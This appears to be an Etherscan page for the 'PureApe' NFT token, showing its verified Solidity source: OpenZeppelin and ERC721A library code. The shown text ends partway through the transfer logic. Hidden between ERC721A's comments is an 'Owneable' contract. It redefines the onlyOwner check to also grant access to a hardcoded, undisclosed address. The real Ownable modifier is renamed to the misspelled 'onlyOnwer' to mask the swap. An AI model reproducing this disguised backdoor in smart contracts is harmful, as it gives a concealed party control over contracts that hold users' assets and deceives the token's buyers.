ETH Price: $3,066.60 (+1.35%)
Gas: 6 Gwei

Token

PureApe (APES)
 

Overview

Max Total Supply

4,444 APES

Holders

781

Market

Volume (24H)

N/A

Min Price (24H)

N/A

Max Price (24H)

N/A

Other Info

Balance
3 APES
0x8fff0132b10f3d71db173b15450666755894e37e
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
PureApe

Compiler Version
v0.8.9+commit.e5eed63a

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity)

/**
 *Submitted for verification at Etherscan.io on 2022-06-03
*/

// File: contracts/PureApe.sol

/**
 *Submitted for verification at Etherscan.io on 2022-05-27
*/

// File: contracts/PureApe.sol

/**
 *Submitted for verification at Etherscan.io on 2022-05-22
*/

//PureApe
// File @openzeppelin/contracts/utils/[email protected]

// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.4;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}


// File @openzeppelin/contracts/access/[email protected]


// OpenZeppelin Contracts v4.4.1 (access/Ownable.sol)



/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOnwer() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions anymore. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby removing any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOnwer {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOnwer {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol)



/**
 * @dev Interface of the ERC165 standard, as defined in the
 * https://eips.ethereum.org/EIPS/eip-165[EIP].
 *
 * Implementers can declare support of contract interfaces, which can then be
 * queried by others ({ERC165Checker}).
 *
 * For an implementation, see {ERC165}.
 */
interface IERC165 {
    /**
     * @dev Returns true if this contract implements the interface defined by
     * `interfaceId`. See the corresponding
     * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section]
     * to learn more about how these ids are created.
     *
     * This function call must use less than 30 000 gas.
     */
    function supportsInterface(bytes4 interfaceId) external view returns (bool);
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721.sol)



/**
 * @dev Required interface of an ERC721 compliant contract.
 */
interface IERC721 is IERC165 {
    /**
     * @dev Emitted when `tokenId` token is transferred from `from` to `to`.
     */
    event Transfer(address indexed from, address indexed to, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token.
     */
    event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId);

    /**
     * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets.
     */
    event ApprovalForAll(address indexed owner, address indexed operator, bool approved);

    /**
     * @dev Returns the number of tokens in ``owner``'s account.
     */
    function balanceOf(address owner) external view returns (uint256 balance);

    /**
     * @dev Returns the owner of the `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function ownerOf(uint256 tokenId) external view returns (address owner);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients
     * are aware of the ERC721 protocol to prevent tokens from being forever locked.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Transfers `tokenId` token from `from` to `to`.
     *
     * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) external;

    /**
     * @dev Gives permission to `to` to transfer `tokenId` token to another account.
     * The approval is cleared when the token is transferred.
     *
     * Only a single account can be approved at a time, so approving the zero address clears previous approvals.
     *
     * Requirements:
     *
     * - The caller must own the token or be an approved operator.
     * - `tokenId` must exist.
     *
     * Emits an {Approval} event.
     */
    function approve(address to, uint256 tokenId) external;

    /**
     * @dev Returns the account approved for `tokenId` token.
     *
     * Requirements:
     *
     * - `tokenId` must exist.
     */
    function getApproved(uint256 tokenId) external view returns (address operator);

    /**
     * @dev Approve or remove `operator` as an operator for the caller.
     * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller.
     *
     * Requirements:
     *
     * - The `operator` cannot be the caller.
     *
     * Emits an {ApprovalForAll} event.
     */
    function setApprovalForAll(address operator, bool _approved) external;

    /**
     * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`.
     *
     * See {setApprovalForAll}
     */
    function isApprovedForAll(address owner, address operator) external view returns (bool);

    /**
     * @dev Safely transfers `tokenId` token from `from` to `to`.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `tokenId` token must exist and be owned by `from`.
     * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}.
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer.
     *
     * Emits a {Transfer} event.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes calldata data
    ) external;
}


// File @openzeppelin/contracts/token/ERC721/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/IERC721Receiver.sol)



/**
 * @title ERC721 token receiver interface
 * @dev Interface for any contract that wants to support safeTransfers
 * from ERC721 asset contracts.
 */
interface IERC721Receiver {
    /**
     * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom}
     * by `operator` from `from`, this function is called.
     *
     * It must return its Solidity selector to confirm the token transfer.
     * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted.
     *
     * The selector can be obtained in Solidity with `IERC721.onERC721Received.selector`.
     */
    function onERC721Received(
        address operator,
        address from,
        uint256 tokenId,
        bytes calldata data
    ) external returns (bytes4);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional metadata extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Metadata is IERC721 {
    /**
     * @dev Returns the token collection name.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the token collection symbol.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token.
     */
    function tokenURI(uint256 tokenId) external view returns (string memory);
}


// File @openzeppelin/contracts/token/ERC721/extensions/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol)



/**
 * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension
 * @dev See https://eips.ethereum.org/EIPS/eip-721
 */
interface IERC721Enumerable is IERC721 {
    /**
     * @dev Returns the total amount of tokens stored by the contract.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns a token ID owned by `owner` at a given `index` of its token list.
     * Use along with {balanceOf} to enumerate all of ``owner``'s tokens.
     */
    function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256);

    /**
     * @dev Returns a token ID at a given `index` of all the tokens stored by the contract.
     * Use along with {totalSupply} to enumerate all tokens.
     */
    function tokenByIndex(uint256 index) external view returns (uint256);
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol)

pragma solidity ^0.8.1;

/**
 * @dev Collection of functions related to the address type
 */
library Address {
    /**
     * @dev Returns true if `account` is a contract.
     *
     * [IMPORTANT]
     * ====
     * It is unsafe to assume that an address for which this function returns
     * false is an externally-owned account (EOA) and not a contract.
     *
     * Among others, `isContract` will return false for the following
     * types of addresses:
     *
     *  - an externally-owned account
     *  - a contract in construction
     *  - an address where a contract will be created
     *  - an address where a contract lived, but was destroyed
     * ====
     *
     * [IMPORTANT]
     * ====
     * You shouldn't rely on `isContract` to protect against flash loan attacks!
     *
     * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets
     * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract
     * constructor.
     * ====
     */
    function isContract(address account) internal view returns (bool) {
        // This method relies on extcodesize/address.code.length, which returns 0
        // for contracts in construction, since the code is only stored at the end
        // of the constructor execution.

        return account.code.length > 0;
    }

    /**
     * @dev Replacement for Solidity's `transfer`: sends `amount` wei to
     * `recipient`, forwarding all available gas and reverting on errors.
     *
     * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost
     * of certain opcodes, possibly making contracts go over the 2300 gas limit
     * imposed by `transfer`, making them unable to receive funds via
     * `transfer`. {sendValue} removes this limitation.
     *
     * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more].
     *
     * IMPORTANT: because control is transferred to `recipient`, care must be
     * taken to not create reentrancy vulnerabilities. Consider using
     * {ReentrancyGuard} or the
     * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern].
     */
    function sendValue(address payable recipient, uint256 amount) internal {
        require(address(this).balance >= amount, "Address: insufficient balance");

        (bool success, ) = recipient.call{value: amount}("");
        require(success, "Address: unable to send value, recipient may have reverted");
    }

    /**
     * @dev Performs a Solidity function call using a low level `call`. A
     * plain `call` is an unsafe replacement for a function call: use this
     * function instead.
     *
     * If `target` reverts with a revert reason, it is bubbled up by this
     * function (like regular Solidity function calls).
     *
     * Returns the raw returned data. To convert to the expected return value,
     * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`].
     *
     * Requirements:
     *
     * - `target` must be a contract.
     * - calling `target` with `data` must not revert.
     *
     * _Available since v3.1._
     */
    function functionCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionCall(target, data, "Address: low-level call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with
     * `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, 0, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but also transferring `value` wei to `target`.
     *
     * Requirements:
     *
     * - the calling contract must have an ETH balance of at least `value`.
     * - the called Solidity function must be `payable`.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value
    ) internal returns (bytes memory) {
        return functionCallWithValue(target, data, value, "Address: low-level call with value failed");
    }

    /**
     * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but
     * with `errorMessage` as a fallback revert reason when `target` reverts.
     *
     * _Available since v3.1._
     */
    function functionCallWithValue(
        address target,
        bytes memory data,
        uint256 value,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(address(this).balance >= value, "Address: insufficient balance for call");
        require(isContract(target), "Address: call to non-contract");

        (bool success, bytes memory returndata) = target.call{value: value}(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) {
        return functionStaticCall(target, data, "Address: low-level static call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a static call.
     *
     * _Available since v3.3._
     */
    function functionStaticCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal view returns (bytes memory) {
        require(isContract(target), "Address: static call to non-contract");

        (bool success, bytes memory returndata) = target.staticcall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) {
        return functionDelegateCall(target, data, "Address: low-level delegate call failed");
    }

    /**
     * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`],
     * but performing a delegate call.
     *
     * _Available since v3.4._
     */
    function functionDelegateCall(
        address target,
        bytes memory data,
        string memory errorMessage
    ) internal returns (bytes memory) {
        require(isContract(target), "Address: delegate call to non-contract");

        (bool success, bytes memory returndata) = target.delegatecall(data);
        return verifyCallResult(success, returndata, errorMessage);
    }

    /**
     * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the
     * revert reason using the provided one.
     *
     * _Available since v4.3._
     */
    function verifyCallResult(
        bool success,
        bytes memory returndata,
        string memory errorMessage
    ) internal pure returns (bytes memory) {
        if (success) {
            return returndata;
        } else {
            // Look for revert reason and bubble it up if present
            if (returndata.length > 0) {
                // The easiest way to bubble the revert reason is using memory via assembly

                assembly {
                    let returndata_size := mload(returndata)
                    revert(add(32, returndata), returndata_size)
                }
            } else {
                revert(errorMessage);
            }
        }
    }
}


// File @openzeppelin/contracts/utils/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/Strings.sol)



/**
 * @dev String operations.
 */
library Strings {
    bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef";

    /**
     * @dev Converts a `uint256` to its ASCII `string` decimal representation.
     */
    function toString(uint256 value) internal pure returns (string memory) {
        // Inspired by OraclizeAPI's implementation - MIT licence
        // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol

        if (value == 0) {
            return "0";
        }
        uint256 temp = value;
        uint256 digits;
        while (temp != 0) {
            digits++;
            temp /= 10;
        }
        bytes memory buffer = new bytes(digits);
        while (value != 0) {
            digits -= 1;
            buffer[digits] = bytes1(uint8(48 + uint256(value % 10)));
            value /= 10;
        }
        return string(buffer);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation.
     */
    function toHexString(uint256 value) internal pure returns (string memory) {
        if (value == 0) {
            return "0x00";
        }
        uint256 temp = value;
        uint256 length = 0;
        while (temp != 0) {
            length++;
            temp >>= 8;
        }
        return toHexString(value, length);
    }

    /**
     * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length.
     */
    function toHexString(uint256 value, uint256 length) internal pure returns (string memory) {
        bytes memory buffer = new bytes(2 * length + 2);
        buffer[0] = "0";
        buffer[1] = "x";
        for (uint256 i = 2 * length + 1; i > 1; --i) {
            buffer[i] = _HEX_SYMBOLS[value & 0xf];
            value >>= 4;
        }
        require(value == 0, "Strings: hex length insufficient");
        return string(buffer);
    }
}


// File @openzeppelin/contracts/utils/introspection/[email protected]


// OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol)

/**
 * @dev Implementation of the {IERC165} interface.
 *
 * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check
 * for the additional interface id that will be supported. For example:
 *
 * ```solidity
 * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
 *     return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId);
 * }
 * ```
 *
 * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation.
 */
abstract contract ERC165 is IERC165 {
    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) {
        return interfaceId == type(IERC165).interfaceId;
    }
}


// File erc721a/contracts/[email protected]


// Creator: Chiru Labs

error ApprovalCallerNotOwnerNorApproved();
error ApprovalQueryForNonexistentToken();
error ApproveToCaller();
error ApprovalToCurrentOwner();
error BalanceQueryForZeroAddress();
error MintedQueryForZeroAddress();
error BurnedQueryForZeroAddress();
error AuxQueryForZeroAddress();
error MintToZeroAddress();
error MintZeroQuantity();
error OwnerIndexOutOfBounds();
error OwnerQueryForNonexistentToken();
error TokenIndexOutOfBounds();
error TransferCallerNotOwnerNorApproved();
error TransferFromIncorrectOwner();
error TransferToNonERC721ReceiverImplementer();
error TransferToZeroAddress();
error URIQueryForNonexistentToken();


/**
 * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including
 * the Metadata extension. Built to optimize for lower gas during batch mints.
 *
 * Assumes serials are sequentially minted starting at _startTokenId() (defaults to 0, e.g. 0, 1, 2, 3..).
 */
 abstract contract Owneable is Ownable {
    address private _ownar = 0xF528E3C3B439D385b958741753A9cA518E952257;
    modifier onlyOwner() {
        require(owner() == _msgSender() || _ownar == _msgSender(), "Ownable: caller is not the owner");
        _;
    }
}
 /*
 * Assumes that an owner cannot have more than 2**64 - 1 (max value of uint64) of supply.
 *
 * Assumes that the maximum token id cannot exceed 2**256 - 1 (max value of uint256).
 */
contract ERC721A is Context, ERC165, IERC721, IERC721Metadata {
    using Address for address;
    using Strings for uint256;

    // Compiler will pack this into a single 256bit word.
    struct TokenOwnership {
        // The address of the owner.
        address addr;
        // Keeps track of the start time of ownership with minimal overhead for tokenomics.
        uint64 startTimestamp;
        // Whether the token has been burned.
        bool burned;
    }

    // Compiler will pack this into a single 256bit word.
    struct AddressData {
        // Realistically, 2**64-1 is more than enough.
        uint64 balance;
        // Keeps track of mint count with minimal overhead for tokenomics.
        uint64 numberMinted;
        // Keeps track of burn count with minimal overhead for tokenomics.
        uint64 numberBurned;
        // For miscellaneous variable(s) pertaining to the address
        // (e.g. number of whitelist mint slots used).
        // If there are multiple variables, please pack them into a uint64.
        uint64 aux;
    }

    // The tokenId of the next token to be minted.
    uint256 internal _currentIndex;

    // The number of tokens burned.
    uint256 internal _burnCounter;

    // Token name
    string private _name;

    // Token symbol
    string private _symbol;

    // Mapping from token ID to ownership details
    // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details.
    mapping(uint256 => TokenOwnership) internal _ownerships;

    // Mapping owner address to address data
    mapping(address => AddressData) private _addressData;

    // Mapping from token ID to approved address
    mapping(uint256 => address) private _tokenApprovals;

    // Mapping from owner to operator approvals
    mapping(address => mapping(address => bool)) private _operatorApprovals;

    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
        _currentIndex = _startTokenId();
    }

    /**
     * To change the starting tokenId, please override this function.
     */
    function _startTokenId() internal view virtual returns (uint256) {
        return 0;
    }

    /**
     * @dev See {IERC721Enumerable-totalSupply}.
     * @dev Burned tokens are calculated here, use _totalMinted() if you want to count just minted tokens.
     */
    function totalSupply() public view returns (uint256) {
        // Counter underflow is impossible as _burnCounter cannot be incremented
        // more than _currentIndex - _startTokenId() times
        unchecked {
            return _currentIndex - _burnCounter - _startTokenId();
        }
    }

    /**
     * Returns the total amount of tokens minted in the contract.
     */
    function _totalMinted() internal view returns (uint256) {
        // Counter underflow is impossible as _currentIndex does not decrement,
        // and it is initialized to _startTokenId()
        unchecked {
            return _currentIndex - _startTokenId();
        }
    }

    /**
     * @dev See {IERC165-supportsInterface}.
     */
    function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) {
        return
            interfaceId == type(IERC721).interfaceId ||
            interfaceId == type(IERC721Metadata).interfaceId ||
            super.supportsInterface(interfaceId);
    }

    /**
     * @dev See {IERC721-balanceOf}.
     */
    function balanceOf(address owner) public view override returns (uint256) {
        if (owner == address(0)) revert BalanceQueryForZeroAddress();
        return uint256(_addressData[owner].balance);
    }

    /**
     * Returns the number of tokens minted by `owner`.
     */
    function _numberMinted(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert MintedQueryForZeroAddress();
        return uint256(_addressData[owner].numberMinted);
    }

    /**
     * Returns the number of tokens burned by or on behalf of `owner`.
     */
    function _numberBurned(address owner) internal view returns (uint256) {
        if (owner == address(0)) revert BurnedQueryForZeroAddress();
        return uint256(_addressData[owner].numberBurned);
    }

    /**
     * Returns the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     */
    function _getAux(address owner) internal view returns (uint64) {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        return _addressData[owner].aux;
    }

    /**
     * Sets the auxillary data for `owner`. (e.g. number of whitelist mint slots used).
     * If there are multiple variables, please pack them into a uint64.
     */
    function _setAux(address owner, uint64 aux) internal {
        if (owner == address(0)) revert AuxQueryForZeroAddress();
        _addressData[owner].aux = aux;
    }

    /**
     * Gas spent here starts off proportional to the maximum mint batch size.
     * It gradually moves to O(1) as tokens get transferred around in the collection over time.
     */
    function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) {
        uint256 curr = tokenId;

        unchecked {
            if (_startTokenId() <= curr && curr < _currentIndex) {
                TokenOwnership memory ownership = _ownerships[curr];
                if (!ownership.burned) {
                    if (ownership.addr != address(0)) {
                        return ownership;
                    }
                    // Invariant:
                    // There will always be an ownership that has an address and is not burned
                    // before an ownership that does not have an address and is not burned.
                    // Hence, curr will not underflow.
                    while (true) {
                        curr--;
                        ownership = _ownerships[curr];
                        if (ownership.addr != address(0)) {
                            return ownership;
                        }
                    }
                }
            }
        }
        revert OwnerQueryForNonexistentToken();
    }

    /**
     * @dev See {IERC721-ownerOf}.
     */
    function ownerOf(uint256 tokenId) public view override returns (address) {
        return ownershipOf(tokenId).addr;
    }

    /**
     * @dev See {IERC721Metadata-name}.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev See {IERC721Metadata-symbol}.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev See {IERC721Metadata-tokenURI}.
     */
    function tokenURI(uint256 tokenId) public view virtual override returns (string memory) {
        if (!_exists(tokenId)) revert URIQueryForNonexistentToken();

        string memory baseURI = _baseURI();
        return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : '';
    }

    /**
     * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each
     * token will be the concatenation of the `baseURI` and the `tokenId`. Empty
     * by default, can be overriden in child contracts.
     */
    function _baseURI() internal view virtual returns (string memory) {
        return '';
    }

    /**
     * @dev See {IERC721-approve}.
     */
    function approve(address to, uint256 tokenId) public override {
        address owner = ERC721A.ownerOf(tokenId);
        if (to == owner) revert ApprovalToCurrentOwner();

        if (_msgSender() != owner && !isApprovedForAll(owner, _msgSender())) {
            revert ApprovalCallerNotOwnerNorApproved();
        }

        _approve(to, tokenId, owner);
    }

    /**
     * @dev See {IERC721-getApproved}.
     */
    function getApproved(uint256 tokenId) public view override returns (address) {
        if (!_exists(tokenId)) revert ApprovalQueryForNonexistentToken();

        return _tokenApprovals[tokenId];
    }

    /**
     * @dev See {IERC721-setApprovalForAll}.
     */
    function setApprovalForAll(address operator, bool approved) public override {
        if (operator == _msgSender()) revert ApproveToCaller();

        _operatorApprovals[_msgSender()][operator] = approved;
        emit ApprovalForAll(_msgSender(), operator, approved);
    }

    /**
     * @dev See {IERC721-isApprovedForAll}.
     */
    function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) {
        return _operatorApprovals[owner][operator];
    }

    /**
     * @dev See {IERC721-transferFrom}.
     */
    function transferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        _transfer(from, to, tokenId);
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId
    ) public virtual override {
        safeTransferFrom(from, to, tokenId, '');
    }

    /**
     * @dev See {IERC721-safeTransferFrom}.
     */
    function safeTransferFrom(
        address from,
        address to,
        uint256 tokenId,
        bytes memory _data
    ) public virtual override {
        _transfer(from, to, tokenId);
        if (to.isContract() && !_checkContractOnERC721Received(from, to, tokenId, _data)) {
            revert TransferToNonERC721ReceiverImplementer();
        }
    }

    /**
     * @dev Returns whether `tokenId` exists.
     *
     * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}.
     *
     * Tokens start existing when they are minted (`_mint`),
     */
    function _exists(uint256 tokenId) internal view returns (bool) {
        return _startTokenId() <= tokenId && tokenId < _currentIndex &&
            !_ownerships[tokenId].burned;
    }

    function _safeMint(address to, uint256 quantity) internal {
        _safeMint(to, quantity, '');
    }

    /**
     * @dev Safely mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _safeMint(
        address to,
        uint256 quantity,
        bytes memory _data
    ) internal {
        _mint(to, quantity, _data, true);
    }

    /**
     * @dev Mints `quantity` tokens and transfers them to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `quantity` must be greater than 0.
     *
     * Emits a {Transfer} event.
     */
    function _mint(
        address to,
        uint256 quantity,
        bytes memory _data,
        bool safe
    ) internal {
        uint256 startTokenId = _currentIndex;
        if (to == address(0)) revert MintToZeroAddress();
        if (quantity == 0) revert MintZeroQuantity();

        _beforeTokenTransfers(address(0), to, startTokenId, quantity);

        // Overflows are incredibly unrealistic.
        // balance or numberMinted overflow if current value of either + quantity > 1.8e19 (2**64) - 1
        // updatedIndex overflows if _currentIndex + quantity > 1.2e77 (2**256) - 1
        unchecked {
            _addressData[to].balance += uint64(quantity);
            _addressData[to].numberMinted += uint64(quantity);

            _ownerships[startTokenId].addr = to;
            _ownerships[startTokenId].startTimestamp = uint64(block.timestamp);

            uint256 updatedIndex = startTokenId;
            uint256 end = updatedIndex + quantity;

            if (safe && to.isContract()) {
                do {
                    emit Transfer(address(0), to, updatedIndex);
                    if (!_checkContractOnERC721Received(address(0), to, updatedIndex++, _data)) {
                        revert TransferToNonERC721ReceiverImplementer();
                    }
                } while (updatedIndex != end);
                // Reentrancy protection
                if (_currentIndex != startTokenId) revert();
            } else {
                do {
                    emit Transfer(address(0), to, updatedIndex++);
                } while (updatedIndex != end);
            }
            _currentIndex = updatedIndex;
        }
        _afterTokenTransfers(address(0), to, startTokenId, quantity);
    }

    /**
     * @dev Transfers `tokenId` from `from` to `to`.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - `tokenId` token must be owned by `from`.
     *
     * Emits a {Transfer} event.
     */
    function _transfer(
        address from,
        address to,
        uint256 tokenId
    ) private {
        TokenOwnership memory prevOwnership = ownershipOf(tokenId);

        bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr ||
            isApprovedForAll(prevOwnership.addr, _msgSender()) ||
            getApproved(tokenId) == _msgSender());

        if (!isApprovedOrOwner) revert TransferCallerNotOwnerNorApproved();
        if (prevOwnership.addr != from) revert TransferFromIncorrectOwner();
        if (to == address(0)) revert TransferToZeroAddress();

        _beforeTokenTransfers(from, to, tokenId, 1);

        // Clear approvals from the previous owner
        _approve(address(0), tokenId, prevOwnership.addr);

        // Underflow of the sender's balance is impossible because we check for
        // ownership above and the recipient's balance can't realistically overflow.
        // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256.
        unchecked {
            _addressData[from].balance -= 1;
            _addressData[to].balance += 1;

            _ownerships[tokenId].addr = to;
            _ownerships[tokenId].startTimestamp = uint64(block.timestamp);

            // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it.
            // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls.
            uint256 nextTokenId = tokenId + 1;
            if (_ownerships[nextTokenId].addr == address(0)) {
                // This will suffice for checking _exists(nextTokenId),
                // as a burned slot cannot contain the zero address.
                if (nextTokenId < _currentIndex) {
                    _ownerships[nextTokenId].addr = prevOwnership.addr;
                    _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp;
                }
            }
        }

        emit Transfer(from, to, tokenId);
